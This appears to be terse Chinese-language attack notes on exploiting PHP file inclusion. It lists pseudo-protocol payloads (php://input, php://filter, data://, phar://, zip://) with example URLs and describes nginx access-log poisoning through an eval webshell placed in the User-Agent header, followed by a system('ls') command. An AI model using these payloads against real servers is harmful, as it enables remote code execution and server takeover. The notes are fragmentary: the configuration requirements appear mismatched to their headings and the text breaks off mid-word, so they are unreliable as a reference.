伪协议
allow_url_fopen=on
allow_url_include=on
php版本小于等于5.3.0
php://input
allow_url_fopen=on
allow_url_include没有要求
php://filter
allow_url_fopen=ON
allow_url_include=ON
php版本大于5.2
data://
或者利用data协议的base64编码
php版本大于等于5.3.0
phar://
index.php?file=phar://test.zip/phpinfo.txt
zip://
但使用zip协议,需要指定绝对路径,同时将#编码为%23,之后填上压缩包内的文件。
index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt
日志包含
User-Agent:<?php eval($_POST[a]);?>
?file=/var/log/nginx/access.log
a=system(‘ls’);
session.upload_progress和条件竞争
https://www.cnblogs.com/NPFS/p/13795170.html
open_basedir
open_based